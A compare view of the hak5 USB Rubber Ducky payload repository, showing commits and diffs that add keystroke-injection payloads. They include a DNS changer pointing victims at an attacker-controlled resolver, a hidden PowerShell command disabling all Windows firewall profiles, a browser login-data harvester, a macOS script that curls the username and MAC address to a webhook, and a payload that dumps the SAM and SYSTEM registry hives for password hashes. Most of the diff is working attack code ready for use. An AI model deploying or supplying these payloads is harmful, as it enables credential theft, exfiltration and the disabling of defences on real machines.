hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Compare commits

base: hak5:acc8dd6ea8aa89bdb3c22923889886ffa895cc91
Branches Tags
hak5:master
hak5:improve-duckylogger
hak5:more_extensions
hak5:add-docs
...
compare: hak5:bab7699944870d4064337e19a62e1468a0251d15
Branches Tags
hak5:master
hak5:improve-duckylogger
hak5:more_extensions
hak5:add-docs

43 Commits
acc8dd6ea8 ... bab7699944

Author SHA1 Message Date
Mark bab7699944
Merge f843113663 into f3053273a4 2024-11-09 22:41:10 -07:00
Peaks f3053273a4
Merge pull request #493 from aleff-github/patch-95 
Windows Spam Terminals
 2024-11-08 06:24:15 -05:00
Peaks d5e02033fe
Merge pull request #498 from brunoooost/master 
Adding RickRoll-Contact-iOS
 2024-11-07 05:20:00 -05:00
bst04 b2b8cf8b2e changing category 2024-11-06 11:48:33 +01:00
Peaks 3333420b26
Merge pull request #497 from luu176/master 
Deactivate/Disable Windows Firewall
 2024-11-05 15:08:33 -05:00
bst04 8cd44e511c eliminate other payload 2024-11-04 15:03:31 +01:00
bst04 bad6fb6040 Adding Send-WhatsApp-Messages-MacOS to prank category 2024-11-04 15:02:21 +01:00
bst04 9c3f29df37 Adding RickRoll-Contact-iOS 2024-11-04 14:58:00 +01:00
Luu 3604620ab9
Create README.md 2024-11-04 13:00:57 +01:00
Luu 261e82a829
Create payload.txt 2024-11-04 13:00:31 +01:00
Peaks 5f13d6090f
Merge pull request #496 from luu176/master 
DNS spoofer
 2024-11-04 06:12:30 -05:00
Luu 1a1c79d5ba
Create payload.txt 2024-11-02 14:58:12 +01:00
Luu 203d986ae4
Create README.md 2024-11-02 14:57:52 +01:00
Peaks 6ae414c545
Merge pull request #495 from luu176/master 
Exfiltrate NTLM hash files onto Rubber Ducky's SD card
 2024-11-02 05:33:29 -04:00
Luu aeffdbfcbd
Delete payloads/library/execution/DNS_spoofer/payload.txt 2024-11-01 22:41:30 +01:00
Luu 9a5857b2af
Delete payloads/library/execution/DNS_spoofer/README.txt 2024-11-01 22:40:51 +01:00
Luu aa5afab7ed
Rename payload.txt to payload.txt 2024-11-01 15:42:11 +01:00
Luu f6fb02fe34
Create README.txt 2024-11-01 15:41:50 +01:00
Luu 0bb2f83a10
Create payload.txt 2024-11-01 15:32:44 +01:00
Luu 4a6e17773d
Update README.md 2024-10-31 12:58:23 +01:00
Luu 81ae8f0e8c
Create README.md 2024-10-31 12:56:53 +01:00
Luu 554b3066b7
Create payload.txt 2024-10-31 12:46:27 +01:00
Peaks 7f56669213
Merge pull request #492 from brunoooost/patch-2 
Disable_WiFi-MacOS
 2024-10-31 06:54:30 -04:00
Peaks 645f1e9fe3
Merge pull request #494 from aleff-github/patch-96 
Exfiltrate Mac Address - MacOS
 2024-10-31 04:43:07 -04:00
bst04 59d4883817 Rename of Disable_WiFi-MacOS 2024-10-31 09:38:35 +01:00
Aleff 1ea9c8a689 Exfiltrate Mac Address - MacOS 2024-10-31 08:23:15 +01:00
Aleff 47fa68ecd9 Windows Spam Terminals 2024-10-31 08:16:18 +01:00
bst04 b9de56e67d
Create README.md 
Adding my README.md to the execution category
 2024-10-30 16:27:47 +01:00
bst04 0403e79d70
Create payload.txt 
Adding my Disable WiFi - MacOS to the execution category.
 2024-10-30 16:22:49 +01:00
Peaks a8c264c752
Merge pull request #486 from UberGuidoZ/master 
DS3 updates and a NEW PAYLOAD!
 2024-10-27 18:11:58 -04:00
UberGuidoZ a18f4561e2
Update payload.txt 
- Increased version for good measure
 2024-10-27 14:49:00 -07:00
UberGuidoZ ad644d8849
Update payload.txt 
- Increased version for good measure
 2024-10-27 14:48:18 -07:00
UberGuidoZ 8c3110d8f1
Update payload.txt 
- Added DS3 ATTACKMODE for ease of use
 2024-10-27 14:40:40 -07:00
UberGuidoZ a94beb0c75
Update payload.txt 
- Added DS3 ATTACKMODE for ease of use
 2024-10-27 14:40:11 -07:00
UberGuidoZ 467075df68
Update payload.txt 
- Added DS3 ATTACKMODE for ease of use
- Changed capital C to lowercase to appease DS3
- Fixed typo in batch
 2024-10-27 14:38:05 -07:00
UberGuidoZ e3c28b36ee
Merge branch 'hak5:master' into master 2024-10-27 14:31:47 -07:00
UberGuidoZ b2c8194099
Create ReadMe.md 2024-10-02 10:50:56 -07:00
UberGuidoZ 97745c360d
Initial commit and upload 2024-10-02 10:32:49 -07:00
Mark f843113663
Update Payload.txt 2024-05-31 09:31:35 -04:00
Mark 81260982f1
Rename CredentialHarvester.txt to Payload.txt 2024-05-28 23:39:23 -04:00
Mark 582bb6138a
Rename VulnerabilityScanner.txt to Payload.txt 2024-05-28 23:38:47 -04:00
Mark 5b5c57f16b
Create VulnerabilityScanner.txt 2024-05-28 23:38:24 -04:00
Mark ddd7d2af4b
Create CredentialHarvester.txt 2024-05-28 23:34:46 -04:00
21 changed files with 1727 additions and 5 deletions
Show Stats Expand all files Collapse all files

27
payloads/library/execution/DNS_spoofer/README.md Normal file
View File

@ -0,0 +1,27 @@
# Spoof DNS - Windows ✅
DNS Spoofer
## Description
A payload used to alter the machines DNS settings, redirecting its DNS requests to an attacker-controlled server that can serve deceptive IP addresses for targeted domains.
### Settings
* Set the primary and secondary dns servers
## Credits
<h2 align="center"> Luu176 </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/luu176">
<img src="https://avatars.githubusercontent.com/u/112649910?v=4?raw=true" width="48" height="48" />
</a>
<br>Github
</td>
</tr>
</table>
</div>

69
payloads/library/execution/DNS_spoofer/payload.txt Normal file
View File

@ -0,0 +1,69 @@
REM Title: DNS changer
REM Author: luu176
REM Description: Changes DNS address of windows machine in powershell
REM Target: Windows 10/11
REM wifi interface should be named: Wi-Fi
DEFINE #interface Ethernet
DEFINE #primaryDNS 192.168.1.3
DEFINE #secondaryDNS 1.1.1.1
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
SAVE_HOST_KEYBOARD_LOCK_STATE
GUI r
DELAY 150
STRINGLN powershell Start-Process powershell -Verb runAs
DELAY 800
ALT y
DELAY 500
STRINGLN Set-DnsClientServerAddress -InterfaceAlias "#interface" -ServerAddresses ("#primaryDNS", "#secondaryDNS"); exit
REM below is to blink the LED when payload done
VAR $i = 0
WHILE ( $i < 9 )
DELAY 150
CAPSLOCK
$i = ( $i + 1 )
END_WHILE
RESTORE_HOST_KEYBOARD_LOCK_STATE

24
payloads/library/execution/Disable_WiFi-MacOS/README.md Normal file
View File

@ -0,0 +1,24 @@
# Disable WiFi 🛜
This payload is designed to turn off the Wi-Fi on a MacOS system. To turn the Wi-Fi back on, simply modify the script to replace "off" with "on".
### Details
- **Title**: Disable WiFi
- **Author**: bst04 - Aleff
- **Version**: 1.0
- **Category**: Execution
- **Target**: MacOS
### Dependencies
- REM Change the #MODE value to "on" if you want to run the WiFi, else leave it as "off"
`DEFINE #MODE off`
## How It Works 📜
1. Sets a user-defined modality (`#MODE`) to `on` or `off`.
2. Uses an extension (`EXTENSION DETECT_READY`) to detect when the device is ready with just a littebit more delay...
3. After readiness is confirmed, the script:
- Runs commands to open **Terminal**.
- Run or stop the WiFi

53
payloads/library/execution/Disable_WiFi-MacOS/payload.txt Normal file
View File

@ -0,0 +1,53 @@
REM_BLOCK
##################################
# #
# Title : Disable WiFi #
# Author : bst04 - Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : MacOS #
# #
##################################
END_REM
REM Change the #MODE value to "on" if you want to run the WiFi, else leave it as "off"
DEFINE #MODE off
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
REM Another pinch of delay in accordance with https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
DELAY 200
GUI SPACE
DELAY 250
STRINGLN TERMINAL
DELAY 250
STRINGLN networksetup -setnetworkserviceenabled Wi-Fi #MODE
DELAY 250
GUI q

23
payloads/library/execution/Firewall_Deactivator/README.md Normal file
View File

@ -0,0 +1,23 @@
# Firewall Deactivator - Windows ✅
Deactivate firewall on windows
## Description
A payload used to deactivate all firewalls on windows in a discrete manner.
## Credits
<h2 align="center"> Luu176 </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/luu176">
<img src="https://avatars.githubusercontent.com/u/112649910?v=4?raw=true" width="48" height="48" />
</a>
<br>Github
</td>
</tr>
</table>
</div>

61
payloads/library/execution/Firewall_Deactivator/payload.txt Normal file
View File

@ -0,0 +1,61 @@
REM Title: Firewall deactivator
REM Author: luu176
REM Description: Deactivate all firewalls in windows machine using hidden powershell
REM Target: Windows
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 200
STRINGLN powershell -Command "Start-Process powershell -ArgumentList '-Command Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False' -Verb RunAs -WindowStyle Hidden"
DELAY 800
ALT y
SAVE_HOST_KEYBOARD_LOCK_STATE
VAR $i = 0
WHILE ( $i < 9 )
DELAY 150
CAPSLOCK
$i = ( $i + 1 )
END_WHILE
RESTORE_HOST_KEYBOARD_LOCK_STATE

63
payloads/library/exfiltration/CredentialHarvester/Payload.txt Normal file
View File

@ -0,0 +1,63 @@
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% Title: CredentialHarvester %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% Author: github.com/markcyber %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% Description: This script exfiltrates credentials %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% Target: Firefox, Chrome, Edge on Windows Machines %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% Category: Exfiltration %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% This script requires a secondary USB named "MYUSB" to save credentials to %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM Open PowerShell with elevated privileges
DELAY 1000
GUI r
DELAY 500
STRING powershell
DELAY 500
ENTER
DELAY 1500
REM Check if the USB drive exists
STRING $usbDrive = Get-WmiObject Win32_Volume ^| Where-Object { $_.Label -eq 'MYUSB' } ^| Select-Object -ExpandProperty DriveLetter;
ENTER
DELAY 500
STRING if ($usbDrive -ne $null) {
ENTER
DELAY 500
STRING cd $usbDrive
ENTER
DELAY 500
STRING mkdir BrowserData
ENTER
DELAY 500
STRING cd BrowserData
ENTER
DELAY 500
REM Copy Chrome Login Data to USB
STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data"
ENTER
STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData" }
ENTER
DELAY 500
REM Copy Firefox Login Data to USB
STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\"
ENTER
STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData" }
ENTER
DELAY 500
REM Copy Edge Login Data to USB
STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data"
ENTER
STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData" }
ENTER
DELAY 500
STRING }
ENTER
DELAY 500
REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on target PC)
STRING echo off ^| clip
ENTER
DELAY 500
REM Close PowerShell
STRING exit
ENTER
DELAY 500

25
payloads/library/exfiltration/Exfiltrate-Mac-Address-MacOS/README.md Normal file
View File

@ -0,0 +1,25 @@
# Exfiltrate Mac Address - MacOS
This payload is designed to retrieve the MAC address and username from a macOS system and send this information to a specified webhook.
### Details
- **Title**: Exfiltrate Mac Address
- **Author**: bst04 - Aleff
- **Version**: 1.0
- **Category**: Exfiltration
- **Target**: MacOS
### Dependencies
- Set the #WEBHOOK to complete the exfiltration
`DEFINE #WEBHOOK example`
## How It Works 📜
1. Sets a user-defined webhook (`#WEBHOOK`) to complete the exfiltration
2. Uses an extension (`EXTENSION DETECT_READY`) to detect when the device is ready with just a littebit more delay...
3. After readiness is confirmed, the script:
- Runs commands to open **Terminal**.
- Acquire the mac address and the system user name
- Send this informations through the Webhook

55
payloads/library/exfiltration/Exfiltrate-Mac-Address-MacOS/payload.txt Normal file
View File

@ -0,0 +1,55 @@
REM_BLOCK
####################################################
# #
# Title : Exfiltrate Mac Address - MacOS #
# Author : bst04 - Aleff #
# Version : 1.0 #
# Category : Exfiltration #
# Target : MacOS #
# #
####################################################
END_REM
REM Set the #WEBHOOK to complete the exfiltration
DEFINE #WEBHOOK example
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
REM Another pinch of delay in accordance with https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
DELAY 200
GUI SPACE
DELAY 250
STRINGLN TERMINAL
DELAY 750
STRINGLN mac=$(networksetup -getmacaddress en0)
DELAY 750
STRINGLN name=$(id -un)
DELAY 850
STRINGLN curl -X POST -H "Content-Type: application/x-www-form-urlencoded" --data-urlencode "content=User:$name | $mac" #WEBHOOK

29
payloads/library/exfiltration/NTLM_ducky/README.md Normal file
View File

@ -0,0 +1,29 @@
# Exfiltrate NTLM Hash - Windows ✅
A Rubber Ducky payload to exfiltrate NTLM hash files from a Windows machine onto the SD card.
## Description
This payload script captures and <strong>exfiltrates NTLM hash files</strong> from a Windows machine. It uses PowerShell commands to locate and save the SAM and SYSTEM files, which contain hashed user passwords, <strong><u>onto the Rubber Ducky's SD card</u></strong> for later extraction and analysis. Upon successful file extraction, <strong> the payload triggers a visual confirmation by <u>blinking the Caps Lock LED</u> </strong>
### Settings
- **Drive Label:** Set the target drive label for Rubber Ducky storage (default: `DUCKY`).
- **Blink Count:** Adjust the number of Caps Lock LED blinks by setting the `#numBlinks` variable (default is 9 blinks).
## Credits
<h2 align="center"> Luu176 </h2>
<div align="center">
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/luu176">
<img src="https://avatars.githubusercontent.com/u/112649910?v=4" width="48" height="48" />
</a>
<br>GitHub
</td>
</tr>
</table>
</div>

81
payloads/library/exfiltration/NTLM_ducky/payload.txt Normal file
View File

@ -0,0 +1,81 @@
REM_BLOCK
TITLE Exfiltrate NTLM Hash Files onto Ducky Storage
AUTHOR Luu176
DESCRIPTION This payload exfiltrates NTLM hash files (which contain hashed passwords for users
on the current Windows device) to the Rubber Ducky's SD card for further analysis.
It utilizes PowerShell commands to locate and save NTLM files (SAM and SYSTEM) to
the defined storage drive on the Ducky device.
END_REM
DEFINE #driveLabel DUCKY
REM below you can set the number of blinks for the caps lock when finished (default 9)
DEFINE #numBlinks 9
ATTACKMODE HID STORAGE
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
SAVE_HOST_KEYBOARD_LOCK_STATE
IF ($_CAPSLOCK_ON == TRUE)
CAPSLOCK
END_IF
GUI d
DELAY 1000
GUI r
DELAY 500
STRINGLN powershell Start-Process powershell -Verb runAs
DELAY 800
ALT y
DELAY 800
STRINGLN cd (gwmi win32_volume -f 'label=''#driveLabel''').Name;reg save hklm\sam SAM;reg save hklm\system SYS;(New-Object -ComObject wscript.shell).SendKeys('{CAPSLOCK}');exit
GUI d
WAIT_FOR_CAPS_ON
REM once finished downloading SAM and SYSTEM, caps lock LED turn on and then flash (note: may take a couple minutes max to download)
VAR $i = 0
WHILE ( $i < #numBlinks )
DELAY 150
CAPSLOCK
$i = ( $i + 1 )
END_WHILE
RESTORE_HOST_KEYBOARD_LOCK_STATE

5
payloads/library/general/1_Script_to_Rule_Them_All/ReadMe.md Normal file
View File

@ -0,0 +1,5 @@
## 1 Script to Rule Them All
The purpose of this frankenstein mess is to use OS detection to run conditional code after, specific to the OS.
It differs from just combining the two extensions in very few ways, but there are slight improvement tweaks from my own testing (hence the new name to avoid conflicts) and more documentation on the process within.

293
payloads/library/general/1_Script_to_Rule_Them_All/payload.txt Normal file
View File

@ -0,0 +1,293 @@
REM Title: One Script To Rule Them All
REM Author: Korben and UberGuidoZ
REM Description: Attempt to detect OS then run conditional code based on result.
REM Target: Windows, macOS, Linux, iOS, ChromeOS, Android, plus custom OS.
REM Version: 1.6
REM Category: All of them
REM Source: https://github.com/UberGuidoZ/Hak5-USBRubberducky-Payloads
EXTENSION OS_DETECTION_UBER
REM VERSION 2.0
REM AUTHOR: Korben and UberGuidoZ
REM_BLOCK DOCUMENTATION
USB Rubber Ducky Host OS Detection (moving target, may fall)
Results may vary greatly depending on a combination of many variables:
- number of testing stages
- specific devices and versions tested against
- number of systems testing for (scope)
- detection techniques (passive/invisible/active/hybrid)
- overall speed
- overall accuracy
If all you require is Windows vs <any other os> detection, the PASSIVE_WINDOWS_DETECT extension is recommended over this one.
TARGET:
DEFAULT - Windows, Mac, Linux
ADVANCED_DETECTION - Windows, Mac, Linux, iOS, ChromeOS, Android, custom defined OS
USAGE:
Call DETECT_OS_UBER() anywhere in your payload after the extension.
Place this extension and the DETECT_OS_UBER() before you would like to first reference $_OS to execute payload code conditionally.
FEEDBACK:
As mentioned above, this a moving target (especially for macOS).
Please report any issues identifying specific operating systems with as much detail as possible.
Your feedback will greatly help solidify the robustness of this extension and others based on it.
DEBUGGING:
SET DEBUGGING_OUTPUT DEFINE to TRUE, deploy on a target with text editor open for debug output
END_REM
REM CONFIGURATION
REM For Debugging (use if troubleshooting or reporting issues):
DEFINE #DEBUGGING_OUTPUT FALSE
DEFINE #ADVANCED_DETECTION FALSE
REM Timing fine tuning:
DEFINE #STARTUP_DELAY 1500
DEFINE #RESTART_WAIT 1000
DEFINE #EXECUTE_DELAY 2000
DEFINE #CONNECT_WAIT 1000
DEFINE #OS_DETECT_MODE HID
REM Define Apple keyboard to keep macOS happy
DEFINE #OS_DETECT_VID VID_05AC
DEFINE #OS_DETECT_PID PID_021E
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #HOST_RESPONSE_TIMEOUT 1000
REM Start DETECT_OS function
FUNCTION DETECT_OS_UBER()
$_HOST_CONFIGURATION_REQUEST_COUNT = 0
ATTACKMODE #OS_DETECT_MODE #OS_DETECT_VID #OS_DETECT_PID
DELAY #STARTUP_DELAY
SAVE_HOST_KEYBOARD_LOCK_STATE
REM Debugging if TRUE
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
IF_DEFINED_TRUE #ADVANCED_DETECTION
STRING ADVANCED OS DETECT
ELSE_DEFINED
STRING OS DETECT
END_IF_DEFINED
ENTER
STRING test caps
END_IF_DEFINED
IF ($_CAPSLOCK_ON == FALSE) THEN
LED_R
CAPSLOCK
DELAY #HOST_RESPONSE_TIMEOUT
END_IF
LED_OFF
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING test done
END_IF_DEFINED
IF $_RECEIVED_HOST_LOCK_LED_REPLY THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING received led response
END_IF_DEFINED
LED_G
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING Prediction: Windows
END_IF_DEFINED
$_OS = WINDOWS
ELSE
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING Prediction: Linux
END_IF_DEFINED
$_OS = LINUX
END_IF
ELSE
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING No LED response
ENTER
STRING Prediciton: MacOS
END_IF_DEFINED
$_OS = MACOS
END_IF
IF_DEFINED_TRUE #ADVANCED_DETECTION
IF ( $_OS == LINUX ) THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING Soft reconnect
END_IF_DEFINED
ATTACKMODE OFF
DELAY #RESTART_WAIT
ATTACKMODE #OS_DETECT_MODE #OS_DETECT_VID #OS_DETECT_PID
DELAY #CONNECT_WAIT
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING Reconnected
END_IF_DEFINED
IF ($_CAPSLOCK_ON == TRUE) THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING Caps LED on
ENTER
STRING Test numlock
END_IF_DEFINED
NUMLOCK
DELAY #HOST_RESPONSE_TIMEOUT
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING Test done
END_IF_DEFINED
IF ($_NUMLOCK_ON == FALSE) THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING No numlock LED
ENTER
STRING Prediciton: ChromeOS
END_IF_DEFINED
$_OS = CHROMEOS
ELSE
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING Numlock LED on
ENTER
STRING Testing scrolllock
END_IF_DEFINED
SCROLLLOCK
DELAY #HOST_RESPONSE_TIMEOUT
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING Test done
END_IF_DEFINED
IF ($_SCROLLLOCK_ON == TRUE) THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING Scrolllock LED on
ENTER
STRING Prediciton: Android
END_IF_DEFINED
$_OS = ANDROID
ELSE
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING No scrolllock reply
ENTER
STRING Prediction: Linux
END_IF_DEFINED
$_OS = LINUX
END_IF
END_IF
END_IF
ELSE IF ($_OS == MACOS) THEN
IF ($_CAPSLOCK_ON == TRUE) THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING Caps LED on
ENTER
STRING Prediction: iOS
END_IF_DEFINED
$_OS = IOS
ELSE
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING No caps reply
ENTER
STRING Prediction: MacOS
END_IF_DEFINED
$_OS = MACOS
END_IF
ELSE IF ($_OS == WINDOWS) THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING Confident Windows Prediction
END_IF_DEFINED
$_OS = WINDOWS
END_IF
END_IF_DEFINED
RESTORE_HOST_KEYBOARD_LOCK_STATE
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING OS_DETECT complete
ENTER
END_IF_DEFINED
END_FUNCTION
END_EXTENSION
EXTENSION HELLO_OS_UBER
REM VERSION 2.0
REM AUTHOR: Korben and UberGuidoZ
REM_BLOCK DOCUMENTATION
USAGE:
For use with OS_DETECTION_UBERExtension, call HELLO_OS_UBER()
after DETECT_OS_UBER() prints the OS determination. Make sure
your custom conditional code is inserted below where commented.
END_REM
REM Defining custom $_OS enums if desired
DEFINE #EXTRA_EXAMPLES FALSE
DEFINE #SOME_OTHER_OS 6
DEFINE #ANOTHER_OS 7
FUNCTION HELLO_OS_UBER()
IF ($_OS == WINDOWS) THEN
REM Windows code starts here
DELAY 1000
GUI r
DELAY 500
STRINGLN notepad
DELAY 1000
STRINGLN Legit DS3 on Windows
REM Windows code ends here
ELSE IF ($_OS == MACOS) THEN
REM macOS code starts here
DELAY 2000
GUI SPACE
DELAY 500
STRINGLN TextEdit
STRINGLN Legit DS3 on macOS
REM macOS code ends here
ELSE IF ($_OS == LINUX) THEN
REM Linux code starts here
DELAY 2000
CTRL ALT t
DELAY 100
STRINGLN nano
STRINGLN Legit DS3 on Linux
REM Linux code ends here
ELSE IF ($_OS == IOS) THEN
REM iOS code starts here
REM iOS code ends here
ELSE IF ($_OS == CHROMEOS) THEN
REM ChromeOS code starts here
REM ChromeOS code ends here
ELSE IF ($_OS == ANDROID) THEN
REM Android code starts here
REM Android code ends here
IF_DEFINED_TRUE #EXTRA_EXAMPLES
ELSE IF($_OS == #SOME_OTHER_OS) THEN
REM Custom Other OS code starts here
REM Custom Other OS code ends here
ELSE IF($_OS == #ANOTHER_OS) THEN
REM Another custom Other OS code starts here
REM Another custom Other OS code ends here
END_IF_DEFINED
ELSE
REM All else fails code starts here
REM All else fails code ends here
END_IF
END_FUNCTION
END_EXTENSION
REM Do the do! Change delay at beginning if desired.
DETECT_OS_UBER()
DELAY #EXECUTE_DELAY
HELLO_OS_UBER()

66
payloads/library/mobile/iOS/RickRoll-Contact-iOS/README.md Normal file
View File

@ -0,0 +1,66 @@
# Create RickRoll Contact - iOS
